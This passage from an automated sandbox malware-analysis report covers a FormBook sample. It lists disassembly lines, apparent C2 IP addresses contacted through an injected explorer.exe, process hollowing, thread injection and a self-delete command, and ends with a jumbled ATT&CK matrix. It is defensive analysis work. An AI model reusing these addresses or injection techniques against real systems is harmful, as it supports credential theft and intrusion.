      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA86A8 mov eax, dword ptr fs:[00000030h]15_2_03BA86A8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA86A8 mov eax, dword ptr fs:[00000030h]15_2_03BA86A8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6C691 mov eax, dword ptr fs:[00000030h]15_2_03B6C691
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0680 mov eax, dword ptr fs:[00000030h]15_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F68C mov eax, dword ptr fs:[00000030h]15_2_03B9F68C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE8690 mov eax, dword ptr fs:[00000030h]15_2_03AE8690
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5C6F2 mov eax, dword ptr fs:[00000030h]15_2_03B5C6F2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5C6F2 mov eax, dword ptr fs:[00000030h]15_2_03B5C6F2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD96E0 mov eax, dword ptr fs:[00000030h]15_2_03AD96E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD96E0 mov eax, dword ptr fs:[00000030h]15_2_03AD96E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEC6E0 mov eax, dword ptr fs:[00000030h]15_2_03AEC6E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE56E0 mov eax, dword ptr fs:[00000030h]15_2_03AE56E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE56E0 mov eax, dword ptr fs:[00000030h]15_2_03AE56E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE56E0 mov eax, dword ptr fs:[00000030h]15_2_03AE56E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B066E0 mov eax, dword ptr fs:[00000030h]15_2_03B066E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B066E0 mov eax, dword ptr fs:[00000030h]15_2_03B066E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0D6D0 mov eax, dword ptr fs:[00000030h]15_2_03B0D6D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE06CF mov eax, dword ptr fs:[00000030h]15_2_03AE06CF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAA6C0 mov eax, dword ptr fs:[00000030h]15_2_03BAA6C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B886C2 mov eax, dword ptr fs:[00000030h]15_2_03B886C2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10630 mov eax, dword ptr fs:[00000030h]15_2_03B10630
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B68633 mov esi, dword ptr fs:[00000030h]15_2_03B68633
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B68633 mov eax, dword ptr fs:[00000030h]15_2_03B68633
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B68633 mov eax, dword ptr fs:[00000030h]15_2_03B68633
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE5622 mov eax, dword ptr fs:[00000030h]15_2_03AE5622
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE5622 mov eax, dword ptr fs:[00000030h]15_2_03AE5622
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7623 mov eax, dword ptr fs:[00000030h]15_2_03AE7623
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1F63F mov eax, dword ptr fs:[00000030h]15_2_03B1F63F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1F63F mov eax, dword ptr fs:[00000030h]15_2_03B1F63F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1C620 mov eax, dword ptr fs:[00000030h]15_2_03B1C620
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8D62C mov ecx, dword ptr fs:[00000030h]15_2_03B8D62C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8D62C mov ecx, dword ptr fs:[00000030h]15_2_03B8D62C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8D62C mov eax, dword ptr fs:[00000030h]15_2_03B8D62C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE0630 mov eax, dword ptr fs:[00000030h]15_2_03AE0630
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0D600 mov eax, dword ptr fs:[00000030h]15_2_03B0D600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0D600 mov eax, dword ptr fs:[00000030h]15_2_03B0D600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4600 mov eax, dword ptr fs:[00000030h]15_2_03BB4600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F607 mov eax, dword ptr fs:[00000030h]15_2_03B9F607
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1360F mov eax, dword ptr fs:[00000030h]15_2_03B1360F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B73608 mov eax, dword ptr fs:[00000030h]15_2_03B73608
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22670 mov eax, dword ptr fs:[00000030h]15_2_03B22670
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22670 mov eax, dword ptr fs:[00000030h]15_2_03B22670
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD7662 mov eax, dword ptr fs:[00000030h]15_2_03AD7662
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD7662 mov eax, dword ptr fs:[00000030h]15_2_03AD7662
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD7662 mov eax, dword ptr fs:[00000030h]15_2_03AD7662
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1666D mov esi, dword ptr fs:[00000030h]15_2_03B1666D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1666D mov eax, dword ptr fs:[00000030h]15_2_03B1666D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1666D mov eax, dword ptr fs:[00000030h]15_2_03B1666D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE0670 mov eax, dword ptr fs:[00000030h]15_2_03AE0670
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B15654 mov eax, dword ptr fs:[00000030h]15_2_03B15654
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD64A mov eax, dword ptr fs:[00000030h]15_2_03ADD64A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD64A mov eax, dword ptr fs:[00000030h]15_2_03ADD64A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1265C mov eax, dword ptr fs:[00000030h]15_2_03B1265C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1265C mov ecx, dword ptr fs:[00000030h]15_2_03B1265C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1265C mov eax, dword ptr fs:[00000030h]15_2_03B1265C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3640 mov eax, dword ptr fs:[00000030h]15_2_03AE3640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF640 mov eax, dword ptr fs:[00000030h]15_2_03AFF640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF640 mov eax, dword ptr fs:[00000030h]15_2_03AFF640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF640 mov eax, dword ptr fs:[00000030h]15_2_03AFF640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1C640 mov eax, dword ptr fs:[00000030h]15_2_03B1C640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1C640 mov eax, dword ptr fs:[00000030h]15_2_03B1C640
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE965A mov eax, dword ptr fs:[00000030h]15_2_03AE965A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE965A mov eax, dword ptr fs:[00000030h]15_2_03AE965A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B685AA mov eax, dword ptr fs:[00000030h]15_2_03B685AA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE45B0 mov eax, dword ptr fs:[00000030h]15_2_03AE45B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE45B0 mov eax, dword ptr fs:[00000030h]15_2_03AE45B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6C592 mov eax, dword ptr fs:[00000030h]15_2_03B6C592
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B12594 mov eax, dword ptr fs:[00000030h]15_2_03B12594
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A580 mov eax, dword ptr fs:[00000030h]15_2_03B1A580
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A580 mov eax, dword ptr fs:[00000030h]15_2_03B1A580
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B19580 mov eax, dword ptr fs:[00000030h]15_2_03B19580
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B19580 mov eax, dword ptr fs:[00000030h]15_2_03B19580
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F582 mov eax, dword ptr fs:[00000030h]15_2_03B9F582
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E588 mov eax, dword ptr fs:[00000030h]15_2_03B5E588
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E588 mov eax, dword ptr fs:[00000030h]15_2_03B5E588
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6C5FC mov eax, dword ptr fs:[00000030h]15_2_03B6C5FC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB5E0 mov eax, dword ptr fs:[00000030h]15_2_03AEB5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A5E7 mov ebx, dword ptr fs:[00000030h]15_2_03B1A5E7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A5E7 mov eax, dword ptr fs:[00000030h]15_2_03B1A5E7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B115EF mov eax, dword ptr fs:[00000030h]15_2_03B115EF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B165D0 mov eax, dword ptr fs:[00000030h]15_2_03B165D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF5C7 mov eax, dword ptr fs:[00000030h]15_2_03ADF5C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B605C6 mov eax, dword ptr fs:[00000030h]15_2_03B605C6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1C5C6 mov eax, dword ptr fs:[00000030h]15_2_03B1C5C6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF252B mov eax, dword ptr fs:[00000030h]15_2_03AF252B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22539 mov eax, dword ptr fs:[00000030h]15_2_03B22539
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD753F mov eax, dword ptr fs:[00000030h]15_2_03AD753F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD753F mov eax, dword ptr fs:[00000030h]15_2_03AD753F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD753F mov eax, dword ptr fs:[00000030h]15_2_03AD753F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1F523 mov eax, dword ptr fs:[00000030h]15_2_03B1F523
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B11527 mov eax, dword ptr fs:[00000030h]15_2_03B11527
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3536 mov eax, dword ptr fs:[00000030h]15_2_03AE3536
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE3536 mov eax, dword ptr fs:[00000030h]15_2_03AE3536
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov ecx, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov ecx, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F51B mov eax, dword ptr fs:[00000030h]15_2_03B8F51B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B01514 mov eax, dword ptr fs:[00000030h]15_2_03B01514
      Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00401759 lstrcatA,CompareFileTime,LdrInitializeThunk,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,5_2_00401759
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D76EC0 SetUnhandledExceptionFilter,15_2_00D76EC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D76B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00D76B40

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.210 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.193.177 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.133 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.19.227 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.210.176 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.51 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.68 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.90 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D60000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeThread register set: target process: 4928Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 4928Jump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,15_2_00D66854
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,15_2_00D68572
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,15_2_00D69310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D848D7 GetSystemTime,SystemTimeToFileTime,15_2_00D848D7
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_00403235

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      1
      Valid Accounts      		1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		1
      Credential API Hooking      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium3
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		1
      Valid Accounts      		1
      Valid Accounts      		3
      Obfuscated Files or Information      		LSASS Memory3
      File and Directory Discovery      		Remote Desktop Protocol1
      Credential API Hooking      		Exfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)1
      Registry Run Keys / Startup Folder      		11
      Access Token Manipulation      		1
      DLL Side-Loading      		Security Account Manager14
      System Information Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		Automated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)511
      Process Injection      		1
      Rootkit      		NTDS4
      Security Software Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer113
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script1
      Registry Run Keys / Startup Folder      		1
      Masquerading      		LSA Secrets2
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Valid Accounts      		Cached Domain Credentials1
      Process Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items2
      Virtualization/Sandbox Evasion      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
      Access Token Manipulation      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)511
      Process Injection      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
